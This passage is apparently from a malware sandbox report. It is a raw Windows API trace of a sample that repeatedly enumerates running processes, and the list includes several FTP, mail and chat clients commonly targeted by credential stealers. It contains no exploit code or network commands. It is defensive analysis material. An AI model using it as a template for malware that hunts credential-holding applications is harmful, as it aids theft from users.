| out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0212.292] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0212.294] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0212.296] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0212.298] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.300] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0212.307] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.309] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.311] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0212.313] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.315] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0212.317] CloseHandle (hObject=0x2130) returned 1 [0212.317] Sleep (dwMilliseconds=0x64) [0212.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x211c [0212.443] Process32First (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.444] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.446] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.448] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.450] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.452] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.454] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.456] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.458] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.460] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.501] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.504] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.506] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.509] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.511] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.513] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.515] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.517] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.519] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.521] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.523] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0212.524] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.526] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0212.528] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.530] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0212.532] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0212.534] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0212.535] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0212.589] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0212.592] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0212.595] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.600] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.603] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0212.606] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.608] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.611] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.614] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.617] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.619] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0212.623] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0212.666] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0212.669] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0212.672] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0212.674] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0212.677] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0212.679] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0212.682] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0212.684] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0212.687] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0212.691] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0212.693] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0212.696] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0212.698] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0212.700] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0212.708] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0212.712] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0212.715] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0212.717] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0212.720] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0212.724] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0212.727] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0212.729] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0212.733] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0212.737] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0212.740] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0212.747] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0212.752] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0212.755] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0212.759] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0212.761] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0212.765] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0212.769] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0212.773] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0212.776] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, 